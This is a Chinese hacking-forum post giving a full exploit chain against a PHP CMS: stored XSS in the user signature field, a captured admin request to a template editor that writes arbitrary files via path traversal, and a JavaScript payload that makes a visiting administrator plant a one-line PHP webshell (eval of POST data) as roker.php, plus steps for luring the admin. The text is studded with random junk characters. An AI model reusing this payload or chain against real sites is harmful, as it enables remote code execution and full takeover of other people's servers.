|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
' P. `7 ]: @4 {( T; L官网已经修补了,所以重新下了源码8 q: {& V, e) w. K- H! W
因为 后台登入 还需要认证码 所以 注入就没看了。
' C o7 i: S3 C5 x, d4 H6 `0 T& j存在 xss+ T2 r. J: l& Q) x
漏洞文件 user/member/skin_edit.php
, V+ [( h- _2 x本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
; M/ `" b' N' z& ?, C. `
- @' }, |) s8 e6 ]9 {$ t I</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>7 K' {. O2 L( b( Z# p5 A
. C! y7 w7 G. x% _& J1 r$ C1 `4 c/ A</textarea></td></tr>- h2 K9 X5 T, |5 O6 {3 [
D n: {1 o- d3 W0 y: [! Z user/do.php ; g! a; Q S* \3 f& P! L: Y6 C, w0 ^# i
% p1 L; E* \9 Q# }
7 a2 K5 x+ V ?9 g7 ? n& Z7 Lif($op=='zl'){ //资料+ E% b3 Y% a; ^
1 u4 v/ Y* A F if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
: l' _0 g( [0 B& n exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
) M; Y2 @7 }; w4 S+ @2 i7 V2 {) w & I- E2 N+ |- V9 q5 d* i, S6 z$ Q- P
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',* G& M( u: M/ i" C* b
: @5 X/ y( y7 Z1 A( w) V8 a CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
/ C" R4 _0 b7 v) r& E where CS_Name='".$cscms_name."'";
4 S2 ~8 ~' T0 |, G( d% t" n( |
) f' e( O+ D- _' C2 O! ]0 R3 X if($db->query($sql)){0 P5 G, m4 n$ n
0 Z& r( _( T; h" j% z9 l2 g: D! n exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));- { }$ _5 K0 o$ `5 Z
$ y) h# r& h1 F7 D/ c
}else{' q. H: X# C Z) u7 v4 Y+ b' P! T
% z8 K% i0 n2 R exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));" _; R4 s- \$ e: G; O- H3 P, s( V
, g9 @& i3 f4 D1 e& W' L
}+ t; f6 s% V8 x9 N; p9 `& j f
. p! \ Z, O( q: m! {- p* I* n! E
4 A! Z- v2 ?( J3 n/ h! P% e没有 过滤导致xss产生。
j! L, u7 ]9 ~9 Z1 h$ q; x后台 看了下 很奇葩的是可以写任意格式文件。。
9 r+ c" }) L- `& f3 s' v5 q0 w抓包。。
& ~) u6 f" ?( d7 q; w1 q3 }0 x+ Z6 @ W. ~) f( v* W$ @) p& F
+ q! H: y0 u8 L/ Q0 ]0 T' w2 k本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
' d3 j0 r7 x, F1 R( R/ b6 M2 M3 A' A 4 z; o8 c" [" n' i# p7 C
Accept: text/html, application/xhtml+xml, */*
/ K \1 R2 R3 h# S7 J/ N
@. K; E8 ^4 W( hReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
6 O$ C7 m. B8 ^* c Q: R 1 m2 G& u4 k Y8 D1 C
Accept-Language: zh-CN0 | L b. R+ w; I& N$ J9 T( D; J7 d
8 Y( P4 r) t$ n6 e# K. f; x1 ?User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0): [/ r+ F; G1 X0 c3 L5 P2 }' I; w
! Q. U' x+ }% v1 p
Content-Type: application/x-www-form-urlencoded
' M" i* l0 k; I0 U
( W% |$ s# m' i! t) l1 CAccept-Encoding: gzip, deflate
% V! k; o u/ g, H/ A% J4 ]; g 7 z" m C' l" c' ?+ Q) |! k
Host: 127.0.0.1
. a) B& @; P( @+ J: ^$ w 3 Q. g) T/ s& ^8 {& ^7 R6 h
Content-Length: 38& [& o$ @1 u. b w( F0 s9 R
3 d2 x# y* {) B8 I, Y; [& i, \; {DNT: 1
& x2 [* {# A+ |% _ ~4 b. P 1 M5 i/ E% B6 |% ^$ E: O/ ?5 A& c
Connection: Keep-Alive$ P* ]$ V q# ~2 G
* G3 t3 K. p+ ^* M8 w4 O( p
Cache-Control: no-cache4 T6 v7 f8 t0 J, p" [
% r! [. }! H* f# v) G% ?1 H9 N( _0 [
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
+ f, q: g! g1 F7 W
+ E. w8 g4 ^8 f
; M3 ~7 c, N1 `* [, y# z$ ~name=aaa.php&content=%3Cs%3E%3Ca%25%3E
6 v5 l5 s O' a* D' w) I: R
# c6 s0 Z, Z; x) M
$ P0 h9 g7 p- ]8 K; m8 M
+ e, U$ S( _% m+ u' M6 H ?于是 构造js如下。6 h- ?/ j$ e! l( b2 C
9 }* u4 M' {) s8 O1 y本帖隐藏的内容<script> " c6 p9 o4 G f+ X, l
thisTHost = top.location.hostname;" x# v! h/ M2 e: H
% y0 } m! S4 G1 c- z- qthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";+ t" I. z+ d3 ^' R+ y8 K" u. N$ F
6 O C# }# t h+ ^3 ?/ b
function PostSubmit(url, data, msg) {
, P" J1 U- B3 \ var postUrl = url;
- k) }, |) I! a5 Y
% F) W% C2 z) |& Q! _: m var postData = data; + y- r6 ]- z0 A) e9 R
var msgData = msg;
: s3 e8 } M0 _+ v* n6 B0 e var ExportForm = document.createElement("FORM"); 5 h4 d* b, R7 t4 F' f: B; m
document.body.appendChild(ExportForm); 9 M. \ N1 P1 i% y* t3 ^
ExportForm.method = "POST"; 9 d2 G- W2 g \- J
var newElement = document.createElement("input");
9 V: M( S) ^7 w4 o9 U newElement.setAttribute("name", "name"); ' }3 }, _# R' w( A1 ]: [5 t: U- ?
newElement.setAttribute("type", "hidden");
- r: B( U* k/ R) v7 e$ I* } var newElement2 = document.createElement("input");
5 c& K, H0 g, E newElement2.setAttribute("name", "content");
% A0 i% W1 g% D. s* m" E newElement2.setAttribute("type", "hidden"); % K" ?) z! W" ^# ?# E' c' Q7 @
ExportForm.appendChild(newElement);
4 S/ g: `1 m% m( B$ B* h! Y ExportForm.appendChild(newElement2); ) V& m v) R% v6 B. ]; S) {
newElement.value = postData;
: J$ {) [3 X6 Y5 E% F. q newElement2.value = msgData;
; j' Q- s% b; l8 {( t& [ ExportForm.action = postUrl; / d& a/ ]- |+ y1 K+ e
ExportForm.submit();
+ A3 p& d' d3 I; S, s};; E8 \6 {: g9 X% j& F
& C% P* D8 a7 q7 H* x
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");9 R* V. ]7 ~( U+ ]% B3 o5 P3 I
& X( S, r. h+ @0 v( \
</script>. v2 v! \6 _/ [) {
0 ^& {+ v' P& E) V: a0 F" W! u7 o+ O, P1 R1 t& }
& L' H7 k, [! D) V3 l' H5 F" Xhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入5 q, m1 @! U; r
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改) N4 a" |9 p+ v/ z }
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
) n1 p8 r8 j/ @: I5 |7 y |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对